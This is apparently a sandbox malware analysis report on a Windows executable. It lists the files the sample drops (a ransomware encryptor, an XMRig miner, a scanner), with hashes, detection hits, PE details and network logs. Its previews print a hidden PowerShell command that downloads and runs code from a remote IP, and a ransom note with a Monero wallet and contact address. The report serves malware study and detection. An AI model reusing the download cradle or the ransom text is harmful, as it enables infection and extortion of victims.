                                                                                                          SSDEEP:24:BxSAbhdZOvBdauzx2DOXizyczxmW4HjeTKKjX4CIym1ZJXzDqczxoUklWv8nxSAj:BZb0v6eoOYxh4qDYB1ZllxorMv6ZZl
                                                                                                          MD5:036BF0D027A20D62E7DD868313B98553
                                                                                                          SHA1:211AAA403B6C38D4ED8F928AB10F2491DFEC5C7A
                                                                                                          SHA-256:A120B5E5301A0C547C0DDFAD8D07EC9D0AA580BA059AA6067806313406F54051
                                                                                                          SHA-512:72996FAD432B8A09D387371220CEEA3AAB1022378A293F35D28855FD5B6C80C6470B6B2B68A70F35BBAD70453AE91AFF7405A36132AF1CDA84CB1B0FF58A8DDF
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Users\user\Documents\20220813\PowerShell_transcript.179605.PThsxFDM.20220813090655.txt, Author: Florian Roth
                                                                                                          • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\Documents\20220813\PowerShell_transcript.179605.PThsxFDM.20220813090655.txt, Author: Joe Security
                                                                                                          Reputation:unknown
                                                                                                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220813090657..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString('http://212.87.212.218/doanlowd.txt')..Process ID: 4440..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220813090657..**********************..PS>iex(New-Object Net.WebClient).DownloadString('http://212.87.212.218/doanlowd.txt')..File does not exist, download again..Process not started, start process..**********************..Command start time: 20220813091121..*********

                                                                                                          C:\Users\user\Documents\20220813\READ_TO_DECRYPT.txt

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Temp\encrypt.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):304
                                                                                                          Entropy (8bit):5.401968597713595
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:oCX2mDaUXN3c5mGI93DBUEZhoPPtZRvGo5X9dZA8v0XyEGCa7Ok4C:FnDpXN3cuHoPPBvbzZA877OJC
                                                                                                          MD5:9281A0D42336C9C0F79B124DFE173232
                                                                                                          SHA1:BF7477C704F78445101A8805B91257788D7625D0
                                                                                                          SHA-256:799EBF071C25076412549B65814F489337C8746CC1FE76EFB7C4E1FB087CFE2C
                                                                                                          SHA-512:A8310C8C28744E534974D27DAAF6EE87386622D74346D47CC367224F6851653966E68BA2003B3C1AEF89E9007A7D144E5F6219196DB9A66F73137372518971F6
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:Your files have been encrypted..Send 2 XMR to the following wallet 46aUsHcCS9XUu8c3wuyXbvg6qrcuveGcAWWJLd14NnCZPo2uQqg8FddhJZjUhs1d1WHBhdcqWvEAedQir3axX4wJ5h8uuuT..And after pay contact a94673838@proton.me..Get the password to decrypt the file..Your machine code is : d06ed635-68f6-4e9a-955c-4899f5f57b9a

                                                                                                          C:\Users\user\Documents\DVWHKMNFNN\READ_TO_DECRYPT.txt

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Temp\encrypt.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):304
                                                                                                          Entropy (8bit):5.401968597713595
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:oCX2mDaUXN3c5mGI93DBUEZhoPPtZRvGo5X9dZA8v0XyEGCa7Ok4C:FnDpXN3cuHoPPBvbzZA877OJC
                                                                                                          MD5:9281A0D42336C9C0F79B124DFE173232
                                                                                                          SHA1:BF7477C704F78445101A8805B91257788D7625D0
                                                                                                          SHA-256:799EBF071C25076412549B65814F489337C8746CC1FE76EFB7C4E1FB087CFE2C
                                                                                                          SHA-512:A8310C8C28744E534974D27DAAF6EE87386622D74346D47CC367224F6851653966E68BA2003B3C1AEF89E9007A7D144E5F6219196DB9A66F73137372518971F6
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:Your files have been encrypted..Send 2 XMR to the following wallet 46aUsHcCS9XUu8c3wuyXbvg6qrcuveGcAWWJLd14NnCZPo2uQqg8FddhJZjUhs1d1WHBhdcqWvEAedQir3axX4wJ5h8uuuT..And after pay contact a94673838@proton.me..Get the password to decrypt the file..Your machine code is : d06ed635-68f6-4e9a-955c-4899f5f57b9a

                                                                                                          C:\Users\user\Documents\READ_TO_DECRYPT.txt

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Temp\encrypt.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):304
                                                                                                          Entropy (8bit):5.401968597713595
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:oCX2mDaUXN3c5mGI93DBUEZhoPPtZRvGo5X9dZA8v0XyEGCa7Ok4C:FnDpXN3cuHoPPBvbzZA877OJC
                                                                                                          MD5:9281A0D42336C9C0F79B124DFE173232
                                                                                                          SHA1:BF7477C704F78445101A8805B91257788D7625D0
                                                                                                          SHA-256:799EBF071C25076412549B65814F489337C8746CC1FE76EFB7C4E1FB087CFE2C
                                                                                                          SHA-512:A8310C8C28744E534974D27DAAF6EE87386622D74346D47CC367224F6851653966E68BA2003B3C1AEF89E9007A7D144E5F6219196DB9A66F73137372518971F6
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:Your files have been encrypted..Send 2 XMR to the following wallet 46aUsHcCS9XUu8c3wuyXbvg6qrcuveGcAWWJLd14NnCZPo2uQqg8FddhJZjUhs1d1WHBhdcqWvEAedQir3axX4wJ5h8uuuT..And after pay contact a94673838@proton.me..Get the password to decrypt the file..Your machine code is : d06ed635-68f6-4e9a-955c-4899f5f57b9a

                                                                                                          C:\Windows\Temp\daemon.exe

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1699840
                                                                                                          Entropy (8bit):7.917688003692402
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:gANYCW5+0igAxI+BQZ19b6nrLqphqrV9q73g:gmbU+0igsI+BJ+6zq
                                                                                                          MD5:C44C67FBBD78AF44E4E75787E636E1FE
                                                                                                          SHA1:A72928EF28C93893CF510937E6C4C7336F21C50C
                                                                                                          SHA-256:55BC3C6946FE78077BEA015B9E93414DB807495F353A88B2AEB6D9315CB31322
                                                                                                          SHA-512:A566012CE91C6BF48F0BC4EA016C9C4C016DB95A6351373A419D88D83D7773B514C13152AAFECE05612A750076CFA3B2DE768829B1F12505727950D815270E09
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 58%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........6H......."..............P5.0HO..`5...@..............................`O...........`... ..............................................PO.....................................................................................................................UPX0.....P5.............................UPX1.........`5.....................@...UPX2.........PO.....................@...3.96.UPX!.$...`.....Y.+O......8H.I6.Y..... Go build ID: "6X5WoOA2VdysSA9L....GYYJ/I4qZnWPyeYvkhczHz1A5/_u462I....dnf3SIa9X7-ie9/sKMYUOjBf_JvMTYEC..!.GyR". ..I;f.v8H...H.o...l$.H...D$ \$(f..6...H...t!....S....r.T..N.....>.v...L.d$.M..t..H.........d.$.....$...v.....L......^.:1......~..H....,.}.E1.1.L..1....@r9.....q.........H)..{.I..H..Hv?H!.H...._f..|..8cpu.u.1....5;.K.t$pL.P.6...K.2....v.....`{.fz.....".8.p...R.L9.E..L$H/`..w+..2Y.L..M..I..I..?M!.N..A.f.+X(.u.F....fA..ont

                                                                                                          C:\Windows\Temp\encrypt.exe

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\jxatBamQnK.exe
                                                                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1996800
                                                                                                          Entropy (8bit):7.923882357980535
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:vCreVBNgzjxtKsv0+bsDkzZQjXOMDBAQDaRF:vCKVBNg3xtNv0+bsid2yqan
                                                                                                          MD5:9996CC802C43F6FFE4065A514585C209
                                                                                                          SHA1:0C83B25E1B0C3F27162C215FDD05BB14B222C038
                                                                                                          SHA-256:D91EFAFA54EE1D2F6D2C5E296F38339D9BBD65949E077D307F20D9E29C614C94
                                                                                                          SHA-512:044349324C71E0BF9A21A4BCDB8D633F90599C37FD66411D5128369A3D8584DE6391526A6E70374D0161ADE424757FB12791C6AE34635E772D9728A3D31B870B
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: Metadefender, Detection: 21%, Browse
                                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........P......."..............`9...W..p9...@...............................X...........`... ...............................................W.....................................................................................................................UPX0.....`9.............................UPX1.........p9..t..................@...UPX2..........W......v..............@...3.96.UPX!.$...M..j..Q..W.rp....P.IZ....... Go build ID: "8ugjw_VrOsOuxc6B....1RJR/HOeHws7N-U1MiXeOJiMm/Dbgidh....jixKBBqSs8TVwS/XJj1UI9eFw7Jdpzww..!.qt9". ..I;f.v8H...H.o...l$.H...D$ \$(f..Z...H...t!....S....tg.T..0....o.....L.d$.M..t..H.~.....d.$.....$.}{.}....L......^.:1..o.v....H....,.}.E1.1.L..1.s....@r9.....q..........H)..{.I..H..Hv?H!.H...../f..|..8cpu.u.1........t$pL.P.6.}..2....v.....=H..z.....".8t.}_.R.L9.E..L$H/`......2Y.L..M..I..I..?M!.N...kf.+X(.u.F....fA..on..

                                                                                                          C:\Windows\Temp\miner.exe

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Temp\daemon.exe
                                                                                                          File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2474496
                                                                                                          Entropy (8bit):7.9387567231740706
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:4CK/pogdcoaWpUbYY+rnQClqFl5vmpjq2n0p85dTvSezKkpB8oB:4SgdcoAmnQC4FDmpum0p8zcuB8
                                                                                                          MD5:40FE7CDEDA2C973E31A481DB262B6613
                                                                                                          SHA1:1FB253FFF075F220359736581388C4105B3A3BF6
                                                                                                          SHA-256:29CDED12230F02A771E7FBC27D30978600F499454DD061A0FA3F973EF9ECCC92
                                                                                                          SHA-512:EDBD31CAD994538548781AA23ED7C9985D323B4904D97AF814DDA5930B0840633C4281009130CE960F37FDE81C83C9220D17A83AFE22935B60897750EC66D348
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20, Description: Detects XMRIG crypto coin miners, Source: C:\Windows\Temp\miner.exe, Author: Florian Roth
                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\miner.exe, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: Metadefender, Detection: 24%, Browse
                                                                                                          • Antivirus: ReversingLabs, Detection: 77%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...DS.^........../....".`%..`....p.......p...@............................................... ..............................................|....... ...\....\.8...............................................(...................................................UPX0......p.............................UPX1.....`%...p..`%.................@....rsrc....`... ...`...b%.............@...3.96.UPX!.$....X'Y.7Vs...~[%..nc....M..)..ff......@.H..(H...=[.1..y.....,.....s@.lO5f.8MZu...m.HcP<H..PE4tiR2........b.....uF.i.4...4|..9...7.......6.3..ov.`!.8.tS1.L.(.x..6_...N....P.7..-...JE..u......../..x.............f".no.h."............?.vD..xtt=D...wE....zy)f.^8....T..L....b........Js7....8..D$ ^........p..8..._.AUATUWVSH...........?lL...H.x=.;....v......e&.%0..<4[?h...p.1.L.%.$.,..H9........X.........H..3H..]..p5.h.....P..fv.2.|....b....=........83?,.U..t.EX..M..6

                                                                                                          C:\Windows\Temp\rar.exe

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Temp\encrypt.exe
                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):624280
                                                                                                          Entropy (8bit):6.444454126345709
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:L5CA1u0KGF3pr2FA+hYt0sZL65L9BNju8YOJhgX:tCAnKGF3FKxer65LfNlJhgX
                                                                                                          MD5:FAC97E0E14C47740AB74C0C14C0F9CEC
                                                                                                          SHA1:8AE9B8A08EC36E59B89F9D384BD0F06783470A3C
                                                                                                          SHA-256:9C19F842CF9FCA4CB22F64B04D1C26F15E9E80CD6CAA9A37FB75AD4F9EC42C82
                                                                                                          SHA-512:6A2EDD3BD800787BCBD6D109F9972DFBA06253186230B71670985127A8EE2362AFBA933E60A4364642663951A257DCC574B8D53FC79799A3EB2DAB4C2BF83523
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........19._j._j._jf..j._jf..jQ._jf..j._js..j._js.Zk.._js.[k.._js.\k._j...j._j.^jb._j'.Zk.._j'..j._j'.]k._jRich._j........................PE..d....U.a..........".................p..........@.............................@............`..................................................;..x............P..LD...H...>...0..T.......T.......................(... ...8...............@............................text............................... ..`.rdata..:N.......P..................@..@.data...|....P...4...@..............@....pdata..LD...P...F...t..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..T....0.......<..............@..B........................................................................................................................................................................................

                                                                                                          C:\Windows\Temp\scan.exe

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Temp\daemon.exe
                                                                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4741120
                                                                                                          Entropy (8bit):7.9181962974863955
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:98304:++53GGwHj4p6/S7RI6kqhLneeNF0LK8DO4RLGSGs7wKBHrKlDmRMfq:953G2p8SLzXmfLzHmsMf
                                                                                                          MD5:A0B1030B402875ED5AE9338B73E6B5B2
                                                                                                          SHA1:0DD2218D5D1903B5A667F1BA7A2248A394CC597A
                                                                                                          SHA-256:F03010566A3AFAD9D1096A527205B908EF3E7AFD4735857A0F2D6708B0F73B25
                                                                                                          SHA-512:A50414D4D6365720E98D76C77410D4B147F5435ED446AA264E4C4BF28FEAC5449EC77C85B751DE9BBBCC5EFD4BC673A3A296F9EF4ECF7E0F7414A83D1B6EB02B
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: Metadefender, Detection: 32%, Browse
                                                                                                          • Antivirus: ReversingLabs, Detection: 23%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."......`H..........q... ....@...........................................`... .....................................................................................................................................................................UPX0....................................UPX1.....`H.. ...TH.................@...UPX2.................VH.............@...3.96.UPX!.$....Q...J.\...QH.............. Go build ID: "KI8Kpy8Al8lUXBsE....RFS9/tzKZZINhHdzbQCRgTuIf/ctSEFx....aBlOJDgdJm-6GQ/4wmqgqwvPfVTBu....gVWm0". ...I;f.v8H....7..H.l$.H...D$ \$(f..{...Hy.~..!..,..S....]..R......O.......L.d$.M....t......$.....$.........L........ 1...>.......o,.}.E1.1.L..1..@29.....V..q.....})..{.I......H..Hv?H!.H..f..|..8cpu....u.1...I..t$pL..nv.P.6.K.2......kW......z....`{...".8.R.L9.D..[A...L$H/`..2Y.....L..M..I..I..?M!.Nf.+X~...(.u.F....fA..on

                                                                                                          \Device\Mup\computer\PIPE\samr

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Temp\daemon.exe
                                                                                                          File Type:GLS_BINARY_LSB_FIRST
                                                                                                          Category:dropped
                                                                                                          Size (bytes):160
                                                                                                          Entropy (8bit):4.438743916256937
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:rmHfvtH//STGlA1yqGlYUGk+ldyHGlgZty:rmHcKtGFlqty
                                                                                                          MD5:E467C82627F5E1524FDB4415AF19FC73
                                                                                                          SHA1:B86E3AA40E9FBED0494375A702EABAF1F2E56F8E
                                                                                                          SHA-256:116CD35961A2345CE210751D677600AADA539A66F046811FA70E1093E01F2540
                                                                                                          SHA-512:2A969893CC713D6388FDC768C009055BE1B35301A811A7E313D1AEEC1F75C88CCDDCD8308017A852093B1310811E90B9DA76B6330AACCF5982437D84F553183A
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:................................xW4.4.....#Eg.......]..........+.H`........xW4.4.....#Eg......3.qq..7I......6........xW4.4.....#Eg......,..l..@E............

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                          Entropy (8bit):7.917688003692402
                                                                                                          TrID:
                                                                                                          • Win64 Executable (generic) (12005/4) 74.95%
                                                                                                          • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                                          • DOS Executable Generic (2002/1) 12.50%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                                          File name:jxatBamQnK.exe
                                                                                                          File size:1699840
                                                                                                          MD5:c44c67fbbd78af44e4e75787e636e1fe
                                                                                                          SHA1:a72928ef28c93893cf510937e6c4c7336f21c50c
                                                                                                          SHA256:55bc3c6946fe78077bea015b9e93414db807495f353a88b2aeb6d9315cb31322
                                                                                                          SHA512:a566012ce91c6bf48f0bc4ea016c9c4c016db95a6351373a419d88d83d7773b514c13152aafece05612a750076cfa3b2de768829b1f12505727950d815270e09
                                                                                                          SSDEEP:49152:gANYCW5+0igAxI+BQZ19b6nrLqphqrV9q73g:gmbU+0igsI+BJ+6zq
                                                                                                          TLSH:4C7533EA5D78D409C09B87BC60887892C2D0F5D7B3CA9CB25BC6DB84477F49E269D01B
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........6H......."..............P5.0HO..`5...@..............................`O...........`... ............................

                                                                                                          File Icon

                                                                                                          Icon Hash:00828e8e8686b000

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x8f4830
                                                                                                          Entrypoint Section:UPX1
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:6
                                                                                                          OS Version Minor:1
                                                                                                          File Version Major:6
                                                                                                          File Version Minor:1
                                                                                                          Subsystem Version Major:6
                                                                                                          Subsystem Version Minor:1
                                                                                                          Import Hash:6ed4f5f04d62b18d96b26d6db7c18840

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          push ebx
                                                                                                          push esi
                                                                                                          push edi
                                                                                                          push ebp
                                                                                                          dec eax
                                                                                                          lea esi, dword ptr [FFE617EAh]
                                                                                                          dec eax
                                                                                                          lea edi, dword ptr [esi-00355025h]
                                                                                                          push edi
                                                                                                          xor ebx, ebx
                                                                                                          xor ecx, ecx
                                                                                                          dec eax
                                                                                                          or ebp, FFFFFFFFh
                                                                                                          call 00007FE178DABB65h
                                                                                                          add ebx, ebx
                                                                                                          je 00007FE178DABB14h
                                                                                                          rep ret
                                                                                                          mov ebx, dword ptr [esi]
                                                                                                          dec eax
                                                                                                          sub esi, FFFFFFFCh
                                                                                                          adc ebx, ebx
                                                                                                          mov dl, byte ptr [esi]
                                                                                                          rep ret
                                                                                                          dec eax
                                                                                                          lea eax, dword ptr [edi+ebp]
                                                                                                          cmp ecx, 05h
                                                                                                          mov dl, byte ptr [eax]
                                                                                                          jbe 00007FE178DABB33h
                                                                                                          dec eax
                                                                                                          cmp ebp, FFFFFFFCh
                                                                                                          jnbe 00007FE178DABB2Dh
                                                                                                          sub ecx, 04h
                                                                                                          mov edx, dword ptr [eax]
                                                                                                          dec eax
                                                                                                          add eax, 04h
                                                                                                          sub ecx, 04h
                                                                                                          mov dword ptr [edi], edx
                                                                                                          dec eax
                                                                                                          lea edi, dword ptr [edi+04h]
                                                                                                          jnc 00007FE178DABB01h
                                                                                                          add ecx, 04h
                                                                                                          mov dl, byte ptr [eax]
                                                                                                          je 00007FE178DABB22h
                                                                                                          dec eax
                                                                                                          inc eax
                                                                                                          mov byte ptr [edi], dl
                                                                                                          sub ecx, 01h
                                                                                                          mov dl, byte ptr [eax]
                                                                                                          dec eax
                                                                                                          lea edi, dword ptr [edi+01h]
                                                                                                          jne 00007FE178DABB02h
                                                                                                          rep ret
                                                                                                          cld
                                                                                                          inc ecx
                                                                                                          pop ebx
                                                                                                          jmp 00007FE178DABB1Ah
                                                                                                          dec eax
                                                                                                          inc esi
                                                                                                          mov byte ptr [edi], dl
                                                                                                          dec eax
                                                                                                          inc edi
                                                                                                          mov dl, byte ptr [esi]
                                                                                                          add ebx, ebx
                                                                                                          jne 00007FE178DABB1Ch
                                                                                                          mov ebx, dword ptr [esi]
                                                                                                          dec eax
                                                                                                          sub esi, FFFFFFFCh
                                                                                                          adc ebx, ebx
                                                                                                          mov dl, byte ptr [esi]
                                                                                                          jc 00007FE178DABAF8h
                                                                                                          lea eax, dword ptr [ecx+01h]
                                                                                                          jmp 00007FE178DABB19h
                                                                                                          dec eax
                                                                                                          inc ecx
                                                                                                          call ebx
                                                                                                          adc eax, eax
                                                                                                          inc ecx
                                                                                                          call ebx
                                                                                                          adc eax, eax
                                                                                                          add ebx, ebx
                                                                                                          jne 00007FE178DABB1Ch
                                                                                                          mov ebx, dword ptr [esi]
                                                                                                          dec eax
                                                                                                          sub esi, FFFFFFFCh
                                                                                                          adc ebx, ebx
                                                                                                          mov dl, byte ptr [esi]
                                                                                                          jnc 00007FE178DABAF6h
                                                                                                          sub eax, 03h
                                                                                                          jc 00007FE178DABB2Bh
                                                                                                          shl eax, 08h
                                                                                                          movzx edx, dl
                                                                                                          or eax, edx
                                                                                                          dec eax
                                                                                                          inc esi
                                                                                                          xor eax, FFFFFFFFh
                                                                                                          je 00007FE178DABB6Ah
                                                                                                          sar eax, 1

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x4f50000x9cUPX2
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          UPX00x10000x3550000x0unknownunknownunknownunknownIMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          UPX10x3560000x19f0000x19ec00False0.9793509126356239data7.9181949308228745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          UPX20x4f50000x10000x200False0.1953125data1.352949710283797IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect

                                                                                                          Network Behavior

                                                                                                          Snort IDS Alerts

                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                          192.168.2.7104.140.201.42498104432831812 08/13/22-09:07:54.637918TCP2831812ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8)49810443192.168.2.7104.140.201.42

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Aug 13, 2022 09:06:24.230808020 CEST49718443192.168.2.720.82.209.183
                                                                                                          Aug 13, 2022 09:06:24.230861902 CEST4434971820.82.209.183192.168.2.7
                                                                                                          Aug 13, 2022 09:06:24.230973959 CEST49718443192.168.2.720.82.209.183
                                                                                                          Aug 13, 2022 09:06:24.231317997 CEST49719443192.168.2.720.82.209.183
                                                                                                          Aug 13, 2022 09:06:24.231367111 CEST4434971920.82.209.183192.168.2.7
                                                                                                          Aug 13, 2022 09:06:24.231427908 CEST49719443192.168.2.720.82.209.183
                                                                                                          Aug 13, 2022 09:06:24.233452082 CEST49719443192.168.2.720.82.209.183
                                                                                                          Aug 13, 2022 09:06:24.233483076 CEST4434971920.82.209.183192.168.2.7
                                                                                                          Aug 13, 2022 09:06:24.233576059 CEST49718443192.168.2.720.82.209.183
                                                                                                          Aug 13, 2022 09:06:24.233603954 CEST4434971820.82.209.183192.168.2.7
                                                                                                          Aug 13, 2022 09:06:24.382694006 CEST4434971820.82.209.183192.168.2.7
                                                                                                          Aug 13, 2022 09:06:24.382883072 CEST49718443192.168.2.720.82.209.183
                                                                                                          Aug 13, 2022 09:06:24.388799906 CEST4434971920.82.209.183192.168.2.7
                                                                                                          Aug 13, 2022 09:06:24.388987064 CEST49719443192.168.2.720.82.209.183
                                                                                                          Aug 13, 2022 09:06:24.404891014 CEST49718443192.168.2.720.82.209.183
                                                                                                          Aug 13, 2022 09:06:24.404939890 CEST4434971820.82.209.183192.168.2.7
                                                                                                          Aug 13, 2022 09:06:24.405498028 CEST4434971820.82.209.183192.168.2.7
                                                                                                          Aug 13, 2022 09:06:24.405612946 CEST49718443192.168.2.720.82.209.183
                                                                                                          Aug 13, 2022 09:06:24.408078909 CEST49719443192.168.2.720.82.209.183
                                                                                                          Aug 13, 2022 09:06:24.408112049 CEST4434971920.82.209.183192.168.2.7
                                                                                                          Aug 13, 2022 09:06:24.408503056 CEST4434971920.82.209.183192.168.2.7
                                                                                                          Aug 13, 2022 09:06:24.408574104 CEST49719443192.168.2.720.82.209.183
                                                                                                          Aug 13, 2022 09:06:24.432717085 CEST49712443192.168.2.740.126.31.137
                                                                                                          Aug 13, 2022 09:06:24.471501112 CEST49718443192.168.2.720.82.209.183
                                                                                                          Aug 13, 2022 09:06:24.471693039 CEST49719443192.168.2.720.82.209.183
                                                                                                          Aug 13, 2022 09:06:24.515371084 CEST4434971920.82.209.183192.168.2.7
                                                                                                          Aug 13, 2022 09:06:24.519388914 CEST4434971820.82.209.183192.168.2.7
                                                                                                          Aug 13, 2022 09:06:24.605412006 CEST4434971820.82.209.183192.168.2.7
                                                                                                          Aug 13, 2022 09:06:24.605493069 CEST4434971820.82.209.183192.168.2.7
                                                                                                          Aug 13, 2022 09:06:24.605546951 CEST49718443192.168.2.720.82.209.183
                                                                                                          Aug 13, 2022 09:06:24.605587959 CEST49718443192.168.2.720.82.209.183
                                                                                                          Aug 13, 2022 09:06:24.626880884 CEST4434971920.82.209.183192.168.2.7
                                                                                                          Aug 13, 2022 09:06:24.626918077 CEST4434971920.82.209.183192.168.2.7
